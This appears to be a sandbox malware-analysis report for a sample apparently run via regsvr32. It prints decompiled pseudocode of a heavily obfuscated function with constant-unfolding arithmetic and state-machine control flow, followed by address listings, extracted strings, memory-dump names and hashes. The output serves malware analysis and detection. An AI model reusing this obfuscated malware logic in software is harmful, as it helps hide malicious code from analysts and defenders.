												_t995 = _v68 | _v48 | _v52 | _v72 | _v60 | _v56 | _v64 | _v76 | _v80;
												_t1080 = _a40 & 1;
												__eflags = _t1080;
												if(_t1080 != 0) {
													_v48 = 0x9eebbc;
													_v48 = 0x2f;
													_v48 = _v48 / _v48;
													_v48 = _v48 ^ 0x0003719c;
													_v72 = 0xa57900;
													_v72 = _v72 ^ 0x66e47717;
													_v72 = _v72 + 0xf065;
													_v72 = _v72 ^ 0xf1641b79;
													_v72 = _v72 ^ 0x9725c505;
													_v68 = 0x21af5;
													_v68 = _v68 + 0xffff9104;
													_v68 = _v68 | 0x1c2aa4c9;
													_v68 = _v68 << 8;
													_v68 = _v68 ^ 0x2b2ff900;
													__eflags = _t995;
												}
												_v64 = 0xffd2df;
												_v64 = _v64 | 0xb2213557;
												_v64 = _v64 + 0xffff185d;
												_v48 = 0x56;
												_v64 = _v64 / _v24;
												_v64 = _v64 ^ 0x017dbf16;
												_v80 = 0x6d91d;
												_v80 = _v80 ^ 0x7e26289a;
												_v80 = _v80 + 0x7f8b;
												_v80 = _v80 << 0x10;
												_v80 = _v80 ^ 0x711f7828;
												_v76 = 0xad0bde;
												_v76 = _v76 / _v48;
												_v76 = _v76 ^ 0xb6dea56e;
												_v76 = _v76 | 0x0a2a869e;
												_v76 = _v76 ^ 0xbef3f471;
												_v56 = 0xff3dbd;
												_v56 = _v56 >> 8;
												_v56 = _v56 * 0x60;
												_v56 = _v56 ^ 0x005500a5;
												_v48 = 0x337806;
												_v48 = 0x1d;
												_v48 = _v48 / _v48;
												_v48 = _v48 ^ 0x0007ee38;
												_v72 = 0x3f5713;
												_v72 = _v72 + 0x944a;
												_v72 = _v72 | 0xfcbbf177;
												_v72 = _v72 ^ 0xfcb07773;
												_v68 = 0x9cb730;
												_v68 = _v68 / _v20;
												_v68 = _v68 ^ 0x4afc1da9;
												_v68 = _v68 >> 0xf;
												_v68 = _v68 ^ 0x000b56f6;
												_t912 = E003C3B61(_a20, _v64, _t995, _t995, _t1076, _t995, _v80, _v76, _v56, _v48, _v72, _t995, _t995, _v68, _v40);
												_v48 = 0x259f9f;
												_t1075 = _t912;
												_t997 = 0x65;
												_v48 = _v48 * 0x45;
												_v48 = _v48 ^ 0x0a233a0d;
												_v56 = 0xeb66b4;
												_v56 = _v56 + 0xffff74a3;
												_v56 = _v56 * 0x1d;
												_v56 = _v56 ^ 0x1a9c303b;
												_v64 = 0x59427e;
												_v64 = _v64 | 0x6c489e5a;
												_v64 = _v64 + 0xffff444f;
												_v64 = _v64 / _t997;
												_v64 = _v64 ^ 0x0111ef62;
												_t691 =  &_v56; // 0xa233a0d
												E003C43D3(_v48,  *_t691, _v64, _v36);
												_t1086 =  &(_t1086[0xf]);
												__eflags = _t1075;
												if(_t1075 == 0) {
													goto L26;
												} else {
													_v44 = 1;
													_v56 = 0x587ede;
													_v56 = _v56 >> 7;
													_v56 = _v56 + 0xffff297e;
													_v56 = _v56 ^ 0xffffda3a;
													_v64 = 0xe93da4;
													_v64 = _v64 << 0xd;
													_v64 = _v64 << 8;
													_v64 = _v64 | 0xb750446a;
													_v64 = _v64 ^ 0xb7db4a9d;
													_v60 = 0xedf614;
													_t999 = 0x7b;
													_v60 = _v60 / _t999;
													_v60 = _v60 ^ 0x000eacd9;
													_v52 = 0xf3241b;
													_v52 = _v52 >> 8;
													_v52 = _v52 ^ 0x000a3c98;
													_v48 = 0x70bc7b;
													_v48 = _v48 << 0xe;
													_v48 = _v48 ^ 0x2f19ec45;
													_push(_v48);
													_push(_v52);
													_push(_t1075);
													_push( &_v44);
													_push(_v60);
													_push(_v64);
													_t1000 = 4;
													E003D983E(_t1000, _v56);
													_t1086 =  &(_t1086[6]);
													__eflags = _t1080;
													if(_t1080 != 0) {
														_v68 = 0x20ab46;
														_t1001 = 0x52;
														_v68 = _v68 * 0x73;
														_v68 = _v68 << 0x10;
														_v68 = _v68 + 0x9bd4;
														_v68 = _v68 ^ 0xf0729bcb;
														_v72 = 0x9cc26f;
														_v72 = _v72 + 0xffff79f7;
														_v72 = _v72 ^ 0x902181a5;
														_v72 = _v72 ^ 0x90b23899;
														_v64 = 0x5d42f4;
														_v64 = _v64 >> 0xa;
														_v64 = _v64 + 0x7794;
														_v64 = _v64 / _t1001;
														_v64 = _v64 ^ 0x0000543f;
														_v60 = 0x54d89d;
														_v60 = _v60 ^ 0x69dadbbe;
														_v60 = _v60 ^ 0x988a88bb;
														_v60 = _v60 ^ 0xf10e6c93;
														_v56 = 0x2f1420;
														_v56 = _v56 | 0x0ec7e7d0;
														_v56 = _v56 >> 0xc;
														_v56 = _v56 ^ 0x0002e4fc;
														E003DBFAE( &_v16, _v68, _v72, _v64,  &_v44, _t1075, _v60, _v56);
														_v44 = _v44 | 0x00000100;
														_v60 = 0x28c96a;
														_t1003 = 0x5b;
														_v60 = _v60 / _t1003;
														_v60 = _v60 + 0x4047;
														_v60 = _v60 ^ 0x0000b31b;
														_v56 = 0x3ced3d;
														_v56 = _v56 ^ 0x0cac4b7f;
														_v56 = _v56 << 0xd;
														_v56 = _v56 ^ 0x14ce364d;
														_v72 = 0x70f69;
														_v72 = _v72 + 0xffffe0ff;
														_v72 = _v72 >> 0xc;
														_v72 = _v72 + 0x8569;
														_v72 = _v72 ^ 0x0009f702;
														_v68 = 0x89edd1;
														_v68 = _v68 >> 0xd;
														_v68 = _v68 | 0xf55368ef;
														_v68 = _v68 ^ 0xf558c885;
														_v64 = 0x81e80;
														_v64 = _v64 * 0x75;
														_v64 = _v64 << 0xc;
														_v64 = _v64 + 0xffff842a;
														_t829 =  &_v64;
														 *_t829 = _v64 ^ 0x5f0ed252;
														__eflags =  *_t829;
														E003D983E(_v16, _v60, _v56, _v72,  &_v44, _t1075, _v68, _v64);
														_t1086 =  &(_t1086[0xc]);
													}
													_t1077 = 0x1b5e3;
													while(1) {
														L1:
														_t1021 = 0x783e6;
														goto L2;
													}
												}
											} else {
												__eflags = _t1077 - 0xd30ba;
												if(_t1077 == 0xd30ba) {
													_v72 = 0x23e3c;
													_v72 = _v72 << 0xb;
													_t1006 = 0x4e;
													_v72 = _v72 / _t1006;
													_v72 = _v72 + 0xeaa7;
													_v72 = _v72 ^ 0x0032271b;
													_v56 = 0x6d3543;
													_v56 = _v56 << 0xd;
													_v56 = _v56 << 0xa;
													_v56 = _v56 ^ 0xa18913b3;
													_v48 = 0x5a9657;
													_v48 = _v48 ^ 0xc121dba9;
													_v48 = _v48 ^ 0xc17bacc9;
													_v68 = 0xf63154;
													_v68 = _v68 + 0xffffb312;
													_v68 = _v68 << 0xe;
													_v68 = _v68 << 5;
													_t436 =  &_v68;
													 *_t436 = _v68 ^ 0x233441c8;
													__eflags =  *_t436;
													E003D0EE1(_v72, _v56, _v48, _v68, _t1075);
													_t1086 =  &(_t1086[3]);
													L26:
													_t1077 = 0x481da;
													while(1) {
														L1:
														_t1021 = 0x783e6;
														L2:
														_t893 = 0xc17f3;
														L3:
														_t983 = 0x29;
														goto L4;
													}
												} else {
													__eflags = _t1077 - 0xf0d63;
													if(_t1077 != 0xf0d63) {
														goto L40;
													} else {
														_t1077 = 0x1f65b;
														continue;
													}
												}
											}
										}
									}
									L43:
									return _t981;
								}
								if(_t1090 == 0) {
									_v68 = 0x50c9cf;
									_v68 = _v68 << 8;
									_v68 = _v68 + 0xffff0c08;
									_v68 = _v68 >> 8;
									_v68 = _v68 ^ 0x0050c8db;
									_v52 = 0xd8e2e0;
									_v52 = _v52 ^ 0xc92ab15f;
									_v52 = _v52 ^ 0xc9f2762d;
									_v76 = 0xbdb02b;
									_v76 = _v76 | 0x8a2ae8c6;
									_v76 = _v76 + 0xffffe912;
									_v76 = _v76 + 0x643f;
									_v76 = _v76 ^ 0x8ac34281;
									_v72 = 0x14f72a;
									_v72 = _v72 >> 0xf;
									_v72 = _v72 * 0xf;
									_v72 = _v72 + 0xa677;
									_v72 = _v72 ^ 0x00022d8e;
									_v56 = 0x3195bf;
									_v56 = _v56 | 0x7b0abfe9;
									_v56 = _v56 + 0x232;
									_v56 = _v56 ^ 0x7b3f0ca9;
									_v48 = 0x66c9d3;
									_v48 = _v48 >> 2;
									_v48 = _v48 ^ 0x00166bff;
									_push(_v48);
									_push(_v56);
									_push(_v68);
									_push(_v72);
									_push(_v76);
									_t948 = E003C8951(_t983, _v52);
									_v76 = 0xa6f5c0;
									__eflags = _t948;
									_v32 = _t948;
									_t1077 =  !=  ? 0x141a : 0x81c7;
									_v76 = _v76 ^ 0x5a214432;
									_v76 = _v76 ^ 0x806a01aa;
									_v76 = _v76 + 0xe6fb;
									_v76 = _v76 ^ 0xdae7f174;
									_v56 = 0x8af558;
									_v56 = _v56 << 0xc;
									_v56 = _v56 ^ 0x78c3b7cc;
									_v56 = _v56 ^ 0xd79312ac;
									_v72 = 0x6cbff1;
									_v72 = _v72 << 6;
									_v72 = _v72 ^ 0x5c01e0c8;
									_v72 = _v72 | 0x749bd185;
									_v72 = _v72 ^ 0x77b4ab13;
									_v68 = 0x4e15b7;
									_v68 = _v68 << 0xb;
									_t1008 = 0x28;
									_v68 = _v68 / _t1008;
									_v68 = _v68 << 2;
									_v68 = _v68 ^ 0x0b4a3c05;
									E003C79D0(_v76, _v56, _t948, _v72, 0, _v68);
									_t1086 = _t1086 - 0xc + 0x2c;
									goto L38;
								} else {
									if(_t1077 == 0x141a) {
										_v56 = 0xbe9dad;
										_t1010 = 0x5e;
										_v56 = _v56 * 0x29;
										_v56 = _v56 >> 7;
										_v56 = _v56 ^ 0x003d0e82;
										_v68 = 0x7a7133;
										_t231 =  &_v68; // 0x7a7133
										_v68 =  *_t231 * 0x61;
										_v68 = _v68 << 6;
										_v68 = _v68 ^ 0x02727731;
										_v68 = _v68 ^ 0x9b41e61c;
										_v48 = 0x415cff;
										_v48 = _v48 << 0xc;
										_v48 = _v48 ^ 0x15cfb5cb;
										_v72 = 0xab5a98;
										_v72 = _v72 ^ 0xae496987;
										_v72 = _v72 * 0x41;
										_v72 = _v72 * 0x3d;
										_v72 = _v72 ^ 0xa57a758c;
										_v76 = 0x25c7f8;
										_v76 = _v76 | 0x9edeff8c;
										_t1011 = 0x38;
										_v76 = _v76 / _t1010;
										_v76 = _v76 + 0xffffb297;
										_v76 = _v76 ^ 0x01ba544b;
										_v60 = 0xd9f13;
										_v60 = _v60 ^ 0xa28b160c;
										_v60 = _v60 >> 0xe;
										_v60 = _v60 ^ 0x00024e69;
										_v64 = 0x2f93d2;
										_v64 = _v64 << 0xe;
										_v64 = _v64 + 0xffff4688;
										_v64 = _v64 ^ 0xe4fe912d;
										_v52 = 0xe47d58;
										_v52 = _v52 | 0xace6d409;
										_v52 = _v52 ^ 0xace03b60;
										_v80 = 0xdad0d4;
										_push(_t1011);
										_v80 = _v80 / _t1011;
										_v80 = _v80 | 0xfc22f969;
										_push(_t1011);
										_v80 = _v80 * 0x39;
										_v80 = _v80 ^ 0x24044b41;
										_t963 = E003CAD3A(_v68, _v48, _v72, _v56, _t1011, _a44, _v76, _v60, _v64, _v32, _a24, _t1011, _v52, _v80);
										_t1086 =  &(_t1086[0xe]);
										_v40 = _t963;
										__eflags = _t963;
										_t893 = 0xc17f3;
										_t1021 = 0x783e6;
										_t1077 =  !=  ? 0xc17f3 : 0x41456;
										goto L3;
									} else {
										if(_t1077 == 0x1b5e3) {
											_v64 = 0x61b984;
											_v64 = _v64 >> 4;
											_v64 = _v64 + 0xffffa4b7;
											_v64 = _v64 ^ 0x000afeae;
											_v80 = 0xc82c70;
											_v80 = _v80 << 4;
											_v80 = _v80 << 4;
											_v80 = _v80 >> 0xf;
											_v80 = _v80 ^ 0x00081ba6;
											_v60 = 0x349d98;
											_t1013 = 0x4d;
											_v60 = _v60 / _t1013;
											_v60 = _v60 ^ 0x000aaeb3;
											_v56 = 0x74f1a6;
											_v56 = _v56 + 0xc0cd;
											_v56 = _v56 ^ 0x007915fa;
											_t1014 =  *_t1084;
											__eflags = _t1014;
											if(_t1014 == 0) {
												_t966 = 0;
												__eflags = 0;
											} else {
												_t966 = _a4;
											}
											E003D9229(_t1014, _v28, _t1014, _v64, _v80, _v60, _t966, _v56, _t1075);
											_t1086 =  &(_t1086[7]);
											asm("sbb esi, esi");
											_t1077 = (_t1077 & 0xfffec6cb) + 0xd30ba;
											goto L1;
										} else {
											if(_t1077 == 0x1f65b) {
												_v56 = 0xdec936;
												_v56 = _v56 << 0xe;
												_t1015 = 0x17;
												_v56 = _v56 / _t1015;
												_v56 = _v56 ^ 0x07c09442;
												_v56 = 0x719b49;
												_v56 = _v56 ^ 0x771e6830;
												_v56 = _v56 + 0x3a20;
												_v56 = _v56 ^ 0x777aee82;
												_v64 = 0x3c41c3;
												_v64 = _v64 ^ 0x36c84d07;
												_v64 = _v64 ^ 0x918fdabd;
												_v64 = _v64 >> 7;
												_v64 = _v64 ^ 0x014bc23e;
												_v56 = 0xcabd6a;
												_v56 = _v56 ^ 0x0ba5e265;
												_v56 = _v56 + 0x184c;
												_v56 = _v56 ^ 0x0b69959f;
												_v64 = 0x5105c1;
												_v64 = _v64 << 0xe;
												_t1016 = 0x2d;
												_v64 = _v64 * 0x53;
												_v64 = _v64 | 0x01f83ce9;
												_v64 = _v64 ^ 0x37f264f8;
												_v64 = 0xbe1893;
												_v64 = _v64 ^ 0x7c1a238e;
												_v64 = _v64 + 0xffff4fa8;
												_v64 = _v64 + 0x3a5;
												_v64 = _v64 ^ 0x7ca81967;
												_v48 = 0x454865;
												_v48 = _v48 * 0x6d;
												_v48 = _v48 ^ 0x1d79ff85;
												_v48 = 0xa53a6a;
												_v48 = _v48 << 6;
												_v48 = _v48 ^ 0x29421acc;
												_v64 = 0xcfc944;
												_v64 = _v64 >> 5;
												_v64 = _v64 + 0x5a0a;
												_v64 = _v64 / _t1016;
												_v64 = _v64 ^ 0x000026f0;
												_v64 = 0x93cd2e;
												_v64 = _v64 + 0xffff73a5;
												_v64 = _v64 + 0xdf65;
												_v64 = _v64 >> 6;
												_v64 = _v64 ^ 0x00032fe1;
												_v64 = 0x832484;
												_v64 = _v64 << 0xe;
												_v64 = _v64 + 0xffff9604;
												_v64 = _v64 << 0xf;
												_v64 = _v64 ^ 0x4b09e915;
												_v56 = 0x53324c;
												_v56 = _v56 << 0x10;
												_v56 = _v56 + 0xfffff8ae;
												_v56 = _v56 ^ 0x324daf51;
												_v56 = 0xffa79e;
												_v56 = _v56 << 4;
												_v56 = _v56 ^ 0xbb4e47b2;
												_v56 = _v56 ^ 0xb4bb7f08;
												_v56 = 0x12fe79;
												_v56 = _v56 >> 5;
												_v56 = _v56 ^ 0x715af5b5;
												_v56 = _v56 ^ 0x7150e64e;
												_v64 = 0x420844;
												_v64 = _v64 >> 0xf;
												_v64 = _v64 | 0x56a8e93d;
												_v64 = _v64 ^ 0xaecf8b03;
												_v64 = _v64 ^ 0xf86a446e;
												_v48 = 0x656bbc;
												_v48 = _v48 | 0x507559df;
												_v48 = _v48 ^ 0x507cef33;
												_v64 = 0xedf93c;
												_v64 = _v64 >> 7;
												_t1077 = 0x6d7ef;
												_v64 = _v64 + 0x8895;
												_v64 = _v64 + 0x3b8f;
												_v64 = _v64 ^ 0x0000b681;
												while(1) {
													L1:
													_t1021 = 0x783e6;
													goto L2;
												}
											} else {
												if(_t1077 == 0x41456) {
													_v60 = 0x137dae;
													_v60 = _v60 | 0xb8e0bc29;
													_v60 = _v60 + 0xffff6674;
													_v60 = _v60 ^ 0xb8f69955;
													_v56 = 0x7c7301;
													_v56 = _v56 << 0x10;
													_v56 = _v56 + 0xffffe1ef;
													_v56 = _v56 ^ 0x730fd155;
													_a24 = 0x54ded3;
													_a24 = _a24 >> 7;
													_a24 = _a24 / _t983;
													_a24 = _a24 ^ 0x000429ee;
													_v48 = 0x680953;
													_v48 = _v48 + 0xfeb1;
													_t883 =  &_v48;
													 *_t883 = _v48 ^ 0x0061209c;
													__eflags =  *_t883;
													E003D0EE1(_v60, _v56, _a24, _v48, _v32);
												} else {
													if(_t1077 != 0x481da) {
														goto L39;
													} else {
														_v68 = 0x4fc871;
														_t1018 = 0xf;
														_v68 = _v68 / _t1018;
														_v68 = _v68 ^ 0x00024be3;
														_v64 = 0xa1b42e;
														_v64 = _v64 << 9;
														_v64 = _v64 ^ 0x436398cf;
														_v60 = 0x9fb41c;
														_v60 = _v60 >> 0x10;
														_v60 = _v60 ^ 0x00093021;
														_v56 = 0xdedba5;
														_v56 = _v56 + 0xffff0e2e;
														_v56 = _v56 ^ 0x00d3cc1c;
														E003D0EE1(_v68, _v64, _v60, _v56, _v40);
														_t1086 =  &(_t1086[3]);
														_t1077 = 0x41456;
														while(1) {
															L1:
															_t1021 = 0x783e6;
															goto L2;
														}
													}
												}
											}
										}
									}
								}
								goto L43;
								L40:
								__eflags = _t1077 - 0x81c7;
							} while (_t1077 != 0x81c7);
							goto L43;
						}
					}
				}
			}

0x003c9c42
0x003c9c4c
0x003c9c56
0x003c9c5d
0x003c9c61
0x003c9c68
0x003c9c69
0x003c9c70
0x003c9c77
0x003c9c78
0x003c9c7f
0x003c9c86
0x003c9c8d
0x003c9c94
0x003c9c9b
0x003c9c9c
0x003c9c9d
0x003c9ca2
0x003c9ca9
0x003c9cac
0x003c9cb4
0x003c9cb8
0x003c9cc0
0x003c9cc8
0x003c9ccd
0x003c9cd1
0x003c9cd9
0x003c9ce1
0x003c9ce1
0x003c9ce1
0x003c9ce6
0x003c9ce6
0x003c9ce6
0x003c9ceb
0x003c9ceb
0x003c9ced
0x003c9cee
0x003c9cee
0x003c9cee
0x003c9cee
0x003c9cf4
0x00000000
0x00000000
0x003ca3e9
0x003ca3eb
0x003cabd3
0x003cabd5
0x003cabdc
0x003cabdd
0x003cabe0
0x003cabe2
0x003cabe7
0x003cabe8
0x003cabe8
0x00000000
0x003ca3f1
0x003ca3f1
0x003ca3f7
0x003cab69
0x003cab73
0x003cab7b
0x003cab83
0x003cab8f
0x003cab94
0x003cab9e
0x003caba8
0x003cabad
0x003cabb2
0x003cabbe
0x003cabc0
0x00000000
0x003ca3fd
0x003ca3fd
0x003ca3ff
0x003ca4c6
0x003ca4ca
0x003ca567
0x003ca4d0
0x003ca4d0
0x003ca4dd
0x003ca4e1
0x003ca4e9
0x003ca4f1
0x003ca4f9
0x003ca501
0x003ca509
0x003ca511
0x003ca519
0x003ca521
0x003ca52e
0x003ca532
0x003ca537
0x003ca554
0x003ca559
0x003ca55c
0x003ca55e
0x003ca564
0x003ca564
0x003ca56b
0x003ca575
0x003ca57d
0x003ca585
0x003ca58d
0x003ca595
0x003ca59d
0x003ca5a5
0x003ca5aa
0x003ca5b2
0x003ca5ba
0x003ca5c2
0x003ca5ca
0x003ca5d2
0x003ca5da
0x003ca5e2
0x003ca5ea
0x003ca5f2
0x003ca604
0x003ca608
0x003ca610
0x003ca618
0x003ca620
0x003ca628
0x003ca630
0x003ca63d
0x003ca643
0x003ca64c
0x003ca654
0x003ca65c
0x003ca661
0x003ca669
0x003ca691
0x003ca695
0x003ca695
0x003ca697
0x003ca69d
0x003ca6ab
0x003ca6b7
0x003ca6bb
0x003ca6c3
0x003ca6cb
0x003ca6d3
0x003ca6db
0x003ca6e3
0x003ca6eb
0x003ca6f3
0x003ca6fb
0x003ca703
0x003ca708
0x003ca71c
0x003ca71c
0x003ca71e
0x003ca728
0x003ca730
0x003ca742
0x003ca74a
0x003ca74e
0x003ca756
0x003ca75e
0x003ca766
0x003ca76e
0x003ca773
0x003ca77b
0x003ca78d
0x003ca791
0x003ca799
0x003ca7a1
0x003ca7a9
0x003ca7b1
0x003ca7bf
0x003ca7c3
0x003ca7cb
0x003ca7d7
0x003ca7e5
0x003ca7e9
0x003ca7f1
0x003ca7f9
0x003ca801
0x003ca809
0x003ca811
0x003ca821
0x003ca825
0x003ca82d
0x003ca832
0x003ca863
0x003ca868
0x003ca870
0x003ca87b
0x003ca87c
0x003ca880
0x003ca888
0x003ca890
0x003ca89d
0x003ca8a1
0x003ca8a9
0x003ca8b1
0x003ca8b9
0x003ca8c7
0x003ca8cb
0x003ca8dc
0x003ca8e4
0x003ca8e9
0x003ca8ec
0x003ca8ee
0x00000000
0x003ca8f4
0x003ca8f9
0x003ca8fd
0x003ca905
0x003ca90a
0x003ca912
0x003ca91a
0x003ca922
0x003ca927
0x003ca92c
0x003ca934
0x003ca93c
0x003ca94a
0x003ca94d
0x003ca955
0x003ca95d
0x003ca965
0x003ca96a
0x003ca972
0x003ca97a
0x003ca97f
0x003ca987
0x003ca98b
0x003ca98f
0x003ca990
0x003ca991
0x003ca995
0x003ca99f
0x003ca9a0
0x003ca9a5
0x003ca9a8
0x003ca9aa
0x003ca9b0
0x003ca9c1
0x003ca9c2
0x003ca9c6
0x003ca9cb
0x003ca9d3
0x003ca9db
0x003ca9e3
0x003ca9eb
0x003ca9f3
0x003ca9fb
0x003caa03
0x003caa08
0x003caa1a
0x003caa22
0x003caa2a
0x003caa32
0x003caa3a
0x003caa42
0x003caa4a
0x003caa52
0x003caa5a
0x003caa5f
0x003caa7d
0x003caa82
0x003caa8c
0x003caa9a
0x003caa9d
0x003caaa1
0x003caaa9
0x003caab1
0x003caab9
0x003caac1
0x003caac6
0x003caace
0x003caad6
0x003caade
0x003caae3
0x003caaeb
0x003caaf3
0x003caafb
0x003cab00
0x003cab08
0x003cab10
0x003cab1d
0x003cab25
0x003cab2a
0x003cab32
0x003cab32
0x003cab32
0x003cab57
0x003cab5c
0x003cab5c
0x003cab5f
0x003c9ce1
0x003c9ce1
0x003c9ce1
0x00000000
0x003c9ce1
0x003c9ce1
0x003ca405
0x003ca405
0x003ca40b
0x003ca423
0x003ca42d
0x003ca438
0x003ca43c
0x003ca440
0x003ca448
0x003ca450
0x003ca458
0x003ca45d
0x003ca462
0x003ca46a
0x003ca472
0x003ca47a
0x003ca482
0x003ca48a
0x003ca492
0x003ca497
0x003ca49c
0x003ca49c
0x003ca49c
0x003ca4b4
0x003ca4b9
0x003ca4bc
0x003ca4bc
0x003c9ce1
0x003c9ce1
0x003c9ce1
0x003c9ce6
0x003c9ce6
0x003c9ceb
0x003c9ced
0x00000000
0x003c9ced
0x003ca40d
0x003ca40d
0x003ca413
0x00000000
0x003ca419
0x003ca419
0x00000000
0x003ca419
0x003ca413
0x003ca40b
0x003ca3ff
0x003ca3f7
0x003cac96
0x003cac9c
0x003cac9c
0x003c9cfa
0x003ca247
0x003ca24f
0x003ca254
0x003ca25c
0x003ca261
0x003ca269
0x003ca271
0x003ca279
0x003ca281
0x003ca289
0x003ca291
0x003ca299
0x003ca2a1
0x003ca2a9
0x003ca2b1
0x003ca2bb
0x003ca2bf
0x003ca2c7
0x003ca2cf
0x003ca2d7
0x003ca2df
0x003ca2e7
0x003ca2ef
0x003ca2f7
0x003ca2fc
0x003ca304
0x003ca30b
0x003ca30f
0x003ca313
0x003ca317
0x003ca31f
0x003ca324
0x003ca32c
0x003ca32e
0x003ca33c
0x003ca33f
0x003ca347
0x003ca351
0x003ca359
0x003ca361
0x003ca369
0x003ca36e
0x003ca376
0x003ca37e
0x003ca386
0x003ca38b
0x003ca393
0x003ca39b
0x003ca3a3
0x003ca3ab
0x003ca3b6
0x003ca3b9
0x003ca3bd
0x003ca3c2
0x003ca3dc
0x003ca3e1
0x00000000
0x003c9d00
0x003c9d07
0x003ca0b4
0x003ca0c5
0x003ca0c8
0x003ca0cc
0x003ca0d1
0x003ca0d9
0x003ca0e1
0x003ca0e6
0x003ca0ea
0x003ca0ef
0x003ca0f7
0x003ca0ff
0x003ca107
0x003ca10c
0x003ca114
0x003ca11c
0x003ca129
0x003ca132
0x003ca136
0x003ca13e
0x003ca146
0x003ca154
0x003ca155
0x003ca15b
0x003ca163
0x003ca16b
0x003ca173
0x003ca17b
0x003ca180
0x003ca188
0x003ca190
0x003ca195
0x003ca19d
0x003ca1a5
0x003ca1ad
0x003ca1b5
0x003ca1bd
0x003ca1cb
0x003ca1cc
0x003ca1d0
0x003ca1dd
0x003ca1de
0x003ca1e2
0x003ca222
0x003ca227
0x003ca22a
0x003ca22e
0x003ca235
0x003ca23a
0x003ca23f
0x00000000
0x003c9d0d
0x003c9d13
0x003c9fff
0x003ca009
0x003ca00e
0x003ca016
0x003ca01e
0x003ca026
0x003ca02b
0x003ca030
0x003ca035
0x003ca03d
0x003ca04b
0x003ca04e
0x003ca052
0x003ca05a
0x003ca062
0x003ca06a
0x003ca072
0x003ca075
0x003ca077
0x003ca07e
0x003ca07e
0x003ca079
0x003ca079
0x003ca079
0x003ca097
0x003ca09c
0x003ca0a1
0x003ca0a9
0x00000000
0x003c9d19
0x003c9d1f
0x003c9dc4
0x003c9dce
0x003c9dd9
0x003c9dde
0x003c9de4
0x003c9dec
0x003c9df4
0x003c9dfc
0x003c9e04
0x003c9e0c
0x003c9e14
0x003c9e1c
0x003c9e24
0x003c9e29
0x003c9e31
0x003c9e39
0x003c9e41
0x003c9e49
0x003c9e51
0x003c9e59
0x003c9e63
0x003c9e64
0x003c9e68
0x003c9e70
0x003c9e78
0x003c9e80
0x003c9e88
0x003c9e90
0x003c9e98
0x003c9ea0
0x003c9ead
0x003c9eb1
0x003c9eb9
0x003c9ec1
0x003c9ec6
0x003c9ece
0x003c9ed6
0x003c9edb
0x003c9ee9
0x003c9eed
0x003c9ef5
0x003c9efd
0x003c9f05
0x003c9f0d
0x003c9f12
0x003c9f1a
0x003c9f22
0x003c9f27
0x003c9f2f
0x003c9f34
0x003c9f3c
0x003c9f44
0x003c9f49
0x003c9f51
0x003c9f59
0x003c9f61
0x003c9f66
0x003c9f6e
0x003c9f76
0x003c9f7e
0x003c9f83
0x003c9f8b
0x003c9f93
0x003c9f9b
0x003c9fa0
0x003c9fa8
0x003c9fb0
0x003c9fb8
0x003c9fc0
0x003c9fc8
0x003c9fd0
0x003c9fd8
0x003c9fdd
0x003c9fe2
0x003c9fea
0x003c9ff2
0x003c9ce1
0x003c9ce1
0x003c9ce1
0x00000000
0x003c9ce1
0x003c9d25
0x003c9d2b
0x003cabfe
0x003cac08
0x003cac10
0x003cac18
0x003cac20
0x003cac28
0x003cac2d
0x003cac35
0x003cac3d
0x003cac45
0x003cac54
0x003cac58
0x003cac60
0x003cac68
0x003cac70
0x003cac70
0x003cac70
0x003cac8b
0x003c9d31
0x003c9d37
0x00000000
0x003c9d3d
0x003c9d3d
0x003c9d4d
0x003c9d54
0x003c9d58
0x003c9d60
0x003c9d68
0x003c9d6d
0x003c9d75
0x003c9d7d
0x003c9d82
0x003c9d8a
0x003c9d92
0x003c9d9a
0x003c9db2
0x003c9db7
0x003c9dba
0x003c9ce1
0x003c9ce1
0x003c9ce1
0x00000000
0x003c9ce1
0x003c9ce1
0x003c9d37
0x003c9d2b
0x003c9d1f
0x003c9d13
0x003c9d07
0x00000000
0x003cabed
0x003cabed
0x003cabed
0x00000000
0x003cabf9
0x003c9ceb
0x003c9ce6

Strings

{, xrefs: 003C9CD9
NPq, xrefs: 003C9F8B
?d, xrefs: 003CA299
,h[, xrefs: 003CAB94
~BY, xrefs: 003CA8A9
_, xrefs: 003CA5DA
2D!Z, xrefs: 003CA33F
4l, xrefs: 003CA654
3qz, xrefs: 003CA0E1
:#{, xrefs: 003CA8DC
Mz, xrefs: 003CA4E9
3|P, xrefs: 003C9FC8
G@, xrefs: 003CAAA1
-, xrefs: 003C9CD1
Sh, xrefs: 003CAC60
V, xrefs: 003CA742

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :#{$,h[$-$2D!Z$3qz$3|P$4l$?d$G@$Mz$NPq$Sh$V$_${$~BY
API String ID: 0-2252209763
Opcode ID: 61021ef5eb86ac979c205333fded1ee3d501d6e5d7c01204754ab9022beb1fe9
Instruction ID: 5ff5ca9275266240931bd1392a629b413a5a6617bf8fc0e841b9cd7f9754435f
Opcode Fuzzy Hash: 61021ef5eb86ac979c205333fded1ee3d501d6e5d7c01204754ab9022beb1fe9
Instruction Fuzzy Hash: 7E92F1714093819FC399CF25C58A90BBBE1BBC8758F505A1DF4DAA6260D3B4CA49CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 1002B150 Relevance: 19.7, APIs: 13, Instructions: 220
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002B150(struct HWND__* _a4, int _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				struct tagRECT _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				_Unknown_base(*)()* _t71;
				long _t73;
				signed int _t74;
				signed int _t77;
				void* _t80;
				void* _t90;
				intOrPtr* _t91;
				signed int _t112;
				signed int _t119;
				void* _t124;
				intOrPtr _t125;
				void* _t134;
				intOrPtr* _t135;
				intOrPtr* _t141;
				intOrPtr* _t148;
				struct HDC__* _t151;
				struct HWND__* _t152;
				void** _t161;

				_t156 =  &_v60;
				if(_a20 == 0) {
					_t152 = _a4;
					_t71 = E1002A360(__eflags, _t152, 6);
					_t156 =  &(( &_v60)[2]);
				} else {
					_t71 = 0;
					_t152 = _a4;
				}
				_push(_a16);
				if(_t71 == 0) {
					_t73 = DefWindowProcA(_t152, _a8, _a12, ??);
				} else {
					_t73 = CallWindowProcA(_t71, _t152, _a8, _a12);
				}
				_v60 = _t73;
